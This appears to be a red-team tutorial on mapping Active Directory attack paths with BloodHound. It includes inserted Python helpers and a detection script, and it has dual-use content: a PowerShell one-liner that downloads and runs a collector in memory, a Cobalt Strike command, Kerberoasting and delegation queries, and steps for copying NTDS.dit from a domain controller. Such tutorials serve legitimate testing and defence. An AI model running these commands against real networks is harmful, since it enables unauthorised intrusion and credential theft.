Hello fellow red teamers and pen testers! Today, we’re diving into the world of BloodHound, an incredible tool designed to analyze Active Directory environments for security risks and attack paths. BloodHound is a game-changer when it comes to understanding the inner workings of an organization’s AD environment and identifying potential weak points.

In this article, we will discuss the features of BloodHound, its underlying technology, and how to use it effectively. We will also provide plenty of real-world examples to demonstrate how to leverage this powerful tool for your red team and pen-testing engagements. So, buckle up, and let’s start our journey into the fascinating world of BloodHound.

What is BloodHound?

BloodHound, developed by @_wald0, @CptJesus, and @harmj0y, is an open-source tool that leverages graph theory to reveal hidden relationships within Active Directory environments. It’s designed to help penetration testers and red teamers identify potential attack paths that might be exploited to gain access to sensitive resources or escalate privileges.

BloodHound uses a combination of techniques to collect data from an AD environment, including LDAP queries, SMB sessions, and PowerShell remoting. Once the data is collected, it is ingested into a Neo4j graph database, which is then used by the BloodHound web interface to visualize the relationships between objects such as users, computers, and groups.

Why BloodHound Matters

Active Directory is a complex and powerful technology that has become the de facto standard for managing users, computers, and resources in enterprise environments. With its complexity comes a myriad of potential security risks, many of which can be difficult to identify through manual analysis alone.

BloodHound helps security professionals identify and understand these risks by providing a visual representation of the relationships between objects within an AD environment. This allows red teamers and pen testers to easily spot potential attack paths and identify weak points in an organization’s security posture.

Moreover, BloodHound helps blue teams and security administrators to better understand their environment and implement stronger security controls to prevent attacks.

Installing and Setting up BloodHound

Prerequisites

Before installing BloodHound, ensure that you have the following prerequisites installed on your system:

  • Windows 7/8/10 or Windows Server 2008 R2/2012/2016/2019 (for the BloodHound data collector)
  • .NET Framework 4.5 or higher
  • A recent version of Neo4j Community Edition

Installation

To install BloodHound, follow the steps below:

  1. Download the latest release of BloodHound from the GitHub repository (https://github.com/BloodHoundAD/BloodHound/releases).
  2. Extract the archive to a directory of your choice.
  3. Install Neo4j Community Edition from the official website (https://neo4j.com/download/).
  4. After installing Neo4j, configure it to use the BloodHound database by pointing the “dbms.active_database” setting in the “neo4j.conf” file to the “BloodHoundExampleDB.graphdb” directory included in the BloodHound release.
  5. Start the Neo4j service and open the Neo4j browser by navigating to http://localhost:7474.
  6. Set a new password for the “neo4j” user when prompted.
  7. Launch the BloodHound executable (BloodHound.exe) and enter the Neo4j connection details (username: “neo4j”, password: your chosen password, and URL: “bolt://localhost:7687”).

BloodHound Components

BloodHound consists of three main components:

Data Collector (SharpHound)

SharpHound is the data collection component of BloodHound. It’s a C# rewrite of the original PowerShell-based Invoke-BloodHound data collector. SharpHound collects data from the target Active Directory environment using a variety of techniques and outputs it as JSON, which is then imported into the Neo4j database.

BloodHound Web Interface

The BloodHound web interface is an Electron-based application that provides a user-friendly interface for visualizing and querying the data collected by SharpHound. The interface allows you to interact with the Neo4j graph database, displaying the relationships between AD objects, and running built-in queries to identify potential attack paths.

Neo4j Database

Neo4j is a highly scalable, native graph database that stores the data collected by SharpHound. It serves as the backend for the BloodHound web interface, enabling fast and efficient querying of the collected data.

Collecting Data with SharpHound

Invocation Methods

There are several ways to invoke SharpHound, depending on your target environment and operational requirements:

  1. Execute SharpHound directly on the target system (e.g., from a USB drive or a remote file share), or use a PowerShell one-liner to download the SharpHound collector script and load it in memory (the script defines the Invoke-BloodHound function that starts the collection):

    IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')

  2. Use a Cobalt Strike beacon to load and execute SharpHound:

    execute-assembly /path/to/SharpHound.exe

Data Collection Techniques

SharpHound collects data using a combination of LDAP queries, SMB session enumeration, and PowerShell remoting. The following collection methods are supported:

  • Default (LDAP queries for user, group, and computer objects)
  • Group (enumerates group membership)
  • LocalGroup (enumerates local group membership on computers)
  • Session (enumerates SMB sessions)
  • ACL (collects access control entries for AD objects)
  • ObjectProps (collects various properties for AD objects)
  • Trusts (enumerates domain trusts)
  • Container (collects information about organizational units and containers)
  • All (performs all collection methods)

To collect data, execute SharpHound with the desired collection method:

SharpHound.exe --CollectionMethod All

This will generate JSON output files in the current working directory, which can then be ingested by the BloodHound web interface.
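Before uploading a collection, it is worth checking that the files are complete. The following Python script is an added example (not part of the original article or of the BloodHound project): it reads each SharpHound JSON file's meta block, accepts both the v4 layout (records under "data") and the older v3 layout (records under a key named after the object type), and fails when meta.count disagrees with the number of records, which usually means a truncated or edited file. The file layouts and the sample records are assumptions drawn from my reading of the collector's output; verify them against the version you run.

```python
import json

# Constructed sample files in the shape of SharpHound output (assumption:
# v4 nests records under "data", v3 under a key named after the type;
# both carry a "meta" block with "type", "count" and "version").
SAMPLE_FILES = {
    "20240101_users.json": json.dumps({
        "data": [
            {"ObjectIdentifier": "S-1-5-21-1-2-3-1104",
             "Properties": {"name": "ALICE@CORP.LOCAL", "hasspn": False,
                            "pwdlastset": 1700000000}},
            {"ObjectIdentifier": "S-1-5-21-1-2-3-1105",
             "Properties": {"name": "SVC_SQL@CORP.LOCAL", "hasspn": True,
                            "pwdlastset": 1500000000}},
        ],
        "meta": {"methods": 0, "type": "users", "count": 2, "version": 4},
    }),
    "20240101_computers.json": json.dumps({
        "computers": [
            {"ObjectIdentifier": "S-1-5-21-1-2-3-1000",
             "Properties": {"name": "DC01.CORP.LOCAL",
                            "unconstraineddelegation": True}},
        ],
        "meta": {"type": "computers", "count": 1, "version": 3},
    }),
}


def parse_sharphound_file(text):
    """Return (object_type, records) for one SharpHound JSON document.

    Raises ValueError when the document is not a SharpHound file or when
    meta.count does not match the number of records (a sign of a truncated
    or tampered file).
    """
    doc = json.loads(text)
    meta = doc.get("meta")
    if not isinstance(meta, dict) or "type" not in meta:
        raise ValueError("missing SharpHound meta block")
    obj_type = meta["type"]
    # v4 files use "data"; v3 files use the type name as the key.
    records = doc.get("data")
    if records is None:
        records = doc.get(obj_type)
    if not isinstance(records, list):
        raise ValueError(f"no record list for type {obj_type!r}")
    if meta.get("count") != len(records):
        raise ValueError(
            f"meta.count={meta.get('count')} but {len(records)} records present")
    return obj_type, records


def inventory(files):
    """Map each object type to its record count across a set of files."""
    counts = {}
    for _name, text in files.items():
        obj_type, records = parse_sharphound_file(text)
        counts[obj_type] = counts.get(obj_type, 0) + len(records)
    return counts


def names_of(files, obj_type):
    """Collect the BloodHound node names (upper-cased NAME@DOMAIN) of one type."""
    found = []
    for text in files.values():
        t, records = parse_sharphound_file(text)
        if t == obj_type:
            found.extend(r["Properties"]["name"] for r in records)
    return found


if __name__ == "__main__":
    print(inventory(SAMPLE_FILES))
    print(names_of(SAMPLE_FILES, "users"))
```

Run it over the directory SharpHound wrote to (or over the contents of the zip it produced) and compare the per-type counts with what you expect from the domain; a users file that parses but carries far fewer records than the domain has accounts usually means the collection hit an LDAP size limit or lost connectivity part-way through.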

BloodHound Web Interface

Once you have collected data with SharpHound, open the BloodHound web interface and log in with your Neo4j credentials. The main interface consists of a search bar at the top, a graph canvas in the center, and a sidebar on the left that displays information about the currently selected node.

To import the JSON files generated by SharpHound, click on the “Upload Data” button in the top-right corner of the interface, and select the files from your file system.

Querying the Data

The BloodHound web interface provides several built-in queries that can be used to quickly identify potential attack paths and vulnerabilities. To run a query, click on the “Queries” tab in the left sidebar, and select a query from the list. The graph canvas will update to display the results of the query, with nodes representing AD objects and edges representing relationships between them.

You can also create custom queries using the Cypher query language, which is the native language of Neo4j. To enter a custom query, click on the “Query” tab in the left sidebar, and type your query in the input field.

Common BloodHound Queries

Shortest Path to Domain Admins

This query displays the shortest path from a specified user to the “Domain Admins” group. BloodHound stores node names in upper case (USER@DOMAIN.COM), so the names in the query must be upper-cased to match:

MATCH (n:User {name: 'USERNAME@DOMAIN.COM'}), (m:Group {name: 'DOMAIN ADMINS@DOMAIN.COM'}), p=shortestPath((n)-[*]->(m)) RETURN p

Unconstrained Delegation

This query identifies computers with unconstrained delegation enabled, which can be exploited to impersonate any user on the network:

MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

Kerberoasting

This query identifies users with a Service Principal Name (SPN) set whose password is more than 90 days old; these are the prime candidates for the Kerberoasting attack, since a long-unchanged password is more likely to be weak enough to crack:

MATCH (u:User) WHERE u.hasspn=true AND u.pwdlastset < (datetime().epochseconds - (90 * 24 * 60 * 60)) RETURN u
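The three queries above are graph operations, and the following Python example (added here; not the article's or BloodHound's own code) reproduces them over a small constructed graph so their semantics can be seen without a Neo4j instance: a breadth-first search for the shortest directed path, the unconstrained-delegation filter, and the SPN-plus-password-age filter. Node names, property names and edge labels follow BloodHound's conventions (upper-cased NAME@DOMAIN, hasspn, pwdlastset, unconstraineddelegation, MemberOf/AdminTo/HasSession); the graph itself is constructed for the example.

```python
from collections import deque

# Constructed sample graph (assumption: node names follow BloodHound's
# upper-cased NAME@DOMAIN convention; property names are BloodHound's).
NODES = {
    "ALICE@CORP.LOCAL": {"type": "User", "hasspn": False, "pwdlastset": 1700000000},
    "SVC_SQL@CORP.LOCAL": {"type": "User", "hasspn": True, "pwdlastset": 1500000000},
    "SVC_WEB@CORP.LOCAL": {"type": "User", "hasspn": True, "pwdlastset": 1700000000},
    "BOB@CORP.LOCAL": {"type": "User", "hasspn": False, "pwdlastset": 1690000000},
    "HELPDESK@CORP.LOCAL": {"type": "Group"},
    "DOMAIN ADMINS@CORP.LOCAL": {"type": "Group"},
    "WS01.CORP.LOCAL": {"type": "Computer", "unconstraineddelegation": False},
    "DC01.CORP.LOCAL": {"type": "Computer", "unconstraineddelegation": True},
}

# Directed edges (source, relationship, target) as BloodHound stores them:
# a "HasSession" edge points from the computer to the user logged on to it.
EDGES = [
    ("ALICE@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "BOB@CORP.LOCAL"),
    ("BOB@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("SVC_SQL@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
]


def shortest_path(edges, start, goal):
    """Breadth-first search over directed edges; same semantics as Cypher's
    shortestPath((n)-[*]->(m)). Returns [(src, rel, dst), ...] or None."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    prev = {start: None}          # node -> (predecessor, relationship)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for rel, nxt in adj.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in prev:
        return None
    path, node = [], goal
    while prev[node] is not None:  # walk predecessors back to the start
        src, rel = prev[node]
        path.append((src, rel, node))
        node = src
    return path[::-1]


def unconstrained_delegation(nodes):
    """MATCH (c:Computer {unconstraineddelegation:true}) RETURN c"""
    return sorted(n for n, p in nodes.items()
                  if p["type"] == "Computer" and p.get("unconstraineddelegation"))


def kerberoast_candidates(nodes, now_epoch, max_age_days=90):
    """Users with an SPN whose password is older than max_age_days; this is
    the Kerberoasting query with datetime().epochseconds replaced by now_epoch."""
    cutoff = now_epoch - max_age_days * 24 * 60 * 60
    return sorted(n for n, p in nodes.items()
                  if p["type"] == "User" and p.get("hasspn")
                  and p.get("pwdlastset", 0) < cutoff)


if __name__ == "__main__":
    for hop in shortest_path(EDGES, "ALICE@CORP.LOCAL", "DOMAIN ADMINS@CORP.LOCAL"):
        print("%s -[%s]-> %s" % hop)
    print(unconstrained_delegation(NODES))
    print(kerberoast_candidates(NODES, now_epoch=1705000000))
```

In the sample graph the path ALICE -> HELPDESK -> WS01 -> BOB -> DOMAIN ADMINS is the kind of four-hop chain BloodHound surfaces, and each hop is also the place a defender can break it (remove the help desk's local admin rights, or keep privileged sessions off workstations). One caveat for the delegation query against real data: domain controllers have unconstrained delegation enabled by design, so exclude members of the Domain Controllers group before treating a hit as a finding.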

Offline Analysis with DSInternals and NTDS.dit

In some cases, you may need to perform offline analysis of an Active Directory environment, such as when you have a copy of the NTDS.dit file but no direct access to the live AD environment. In this section, we’ll discuss how to use the DSInternals PowerShell module and its accompanying dsamain.exe tool to mount an NTDS.dit file and perform offline analysis using BloodHound.

The DSInternals PowerShell module, developed by Michael Grafnetter, provides a set of cmdlets for working with Active Directory databases and objects, including the ability to mount and query NTDS.dit files.

To perform offline analysis with DSInternals and BloodHound, follow the steps below:

  1. Install the DSInternals PowerShell module from the PowerShell Gallery:

    Install-Module -Name DSInternals
    
  2. Extract the NTDS.dit file and the associated SYSTEM registry hive from the target domain controller. You can do this using tools like ntdsutil.exe or other forensic tools.

  3. Mount the NTDS.dit file using dsamain.exe:

    dsamain -dbpath "C:\path\to\NTDS.dit" -ldapport 10389 -allowUpgrade -systemKey "C:\path\to\SYSTEM.hive"
    

    This command mounts the NTDS.dit file on the local LDAP port 10389 and uses the SYSTEM registry hive to decrypt the database.

  4. Point the SharpHound data collector at the local LDAP server (localhost, port 10389):

    SharpHound.exe --CollectionMethod All --DomainController localhost --LdapPort 10389 --LdapUsername "DOMAIN\username" --LdapPassword "password"

  5. Execute SharpHound to collect data from the mounted NTDS.dit file.

  6. Import the collected data into the BloodHound web interface, as described in the “BloodHound Web Interface” section above.

  7. Perform analysis and run queries in BloodHound as you would with an online Active Directory environment.

By mounting the NTDS.dit file with dsamain.exe and using the DSInternals PowerShell module, you can perform offline analysis with BloodHound, providing a powerful and flexible way to assess the security posture of an Active Directory environment even when direct access is not available.

Mitigation Strategies

To defend against the types of attacks that BloodHound helps identify, organizations should consider implementing the following mitigation strategies:

  • Regularly review group memberships and access control lists to ensure that only necessary permissions are granted.
  • Disable or restrict high-risk features such as unconstrained delegation and delegation of credentials.
  • Implement strong password policies and regularly review password age for service accounts.
  • Limit the use of high-privilege accounts and restrict their access to sensitive systems.
  • Monitor and audit Active Directory for signs of malicious activity, such as unexpected group membership changes or privilege escalations.
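The last bullet, watching for unexpected group membership changes, can be turned into a concrete detection. The Python below is an added example (not from the article) that scans Windows Security events 4728, 4732 and 4756 (a member was added to a security-enabled global, local or universal group) exported as JSON lines, and raises an alert when the target group is privileged and the actor is not an approved change-management account. The event records are constructed samples whose field names follow the EventData names of those events; the approved-actor list and the privileged-group watchlist are assumptions to be replaced with your own.

```python
import json

# Groups whose membership changes should always be reviewed (watchlist; extend as needed).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Account Operators"}

# Windows Security event IDs for "a member was added to a security-enabled group":
# 4728 (global), 4732 (local), 4756 (universal).
MEMBER_ADDED_EVENTS = {4728, 4732, 4756}

# Accounts allowed to change privileged groups (assumption: one approved
# change-management service account; any other actor is unexpected).
APPROVED_ACTORS = {"svc_iam_automation"}

# Constructed sample events exported as JSON lines.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 4728, "TimeCreated": "2024-01-15T09:12:03Z",
     "SubjectUserName": "svc_iam_automation", "TargetUserName": "Domain Admins",
     "TargetDomainName": "CORP", "MemberName": "CN=Bob,OU=IT,DC=corp,DC=local"},
    {"EventID": 4728, "TimeCreated": "2024-01-15T23:41:57Z",
     "SubjectUserName": "helpdesk7", "TargetUserName": "Domain Admins",
     "TargetDomainName": "CORP", "MemberName": "CN=svc_sql,OU=Service,DC=corp,DC=local"},
    {"EventID": 4732, "TimeCreated": "2024-01-16T08:02:10Z",
     "SubjectUserName": "helpdesk7", "TargetUserName": "Remote Desktop Users",
     "TargetDomainName": "WS01", "MemberName": "CN=Alice,OU=IT,DC=corp,DC=local"},
    {"EventID": 4624, "TimeCreated": "2024-01-16T08:03:00Z",
     "SubjectUserName": "alice", "TargetUserName": "alice"},
])


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def unexpected_privileged_changes(events):
    """Return one alert per privileged-group addition made by a non-approved actor."""
    alerts = []
    for ev in events:
        if ev.get("EventID") not in MEMBER_ADDED_EVENTS:
            continue
        if ev.get("TargetUserName") not in PRIVILEGED_GROUPS:
            continue
        actor = ev.get("SubjectUserName", "")
        if actor in APPROVED_ACTORS:
            continue
        alerts.append({
            "time": ev.get("TimeCreated"),
            "actor": actor,
            "group": f"{ev.get('TargetDomainName')}\\{ev['TargetUserName']}",
            "member": ev.get("MemberName"),
            "event_id": ev["EventID"],
        })
    return alerts


if __name__ == "__main__":
    for alert in unexpected_privileged_changes(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Of the four sample events only the late-night addition of svc_sql to Domain Admins by helpdesk7 is alerted on: the first addition comes from the approved account, the third targets a non-privileged local group, and the fourth is a logon event. The same watchlist idea applies to the 4729/4733/4757 removal events, which matter when an attacker cleans up after themselves.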

Conclusion

BloodHound is an invaluable tool for red teamers, pen testers, and blue teams alike. It provides a powerful and efficient way to analyze Active Directory environments for security risks and attack paths. By using BloodHound to visualize the complex relationships within an AD environment, security professionals can quickly identify potential weak points and develop effective mitigation strategies.

In this article, we’ve covered the installation, setup, and usage of BloodHound, including its components, data collection techniques, and querying capabilities. We’ve also provided real-world examples of how BloodHound has been used to identify security vulnerabilities and discussed mitigation strategies to protect against these threats.

By incorporating BloodHound into your security toolkit, you’ll be well-equipped to identify and understand the risks and attack paths within your target Active Directory environments. Remember that no tool is a silver bullet, and BloodHound should be used in conjunction with other security tools and methodologies for a comprehensive security assessment. Stay curious, keep learning, and happy hacking!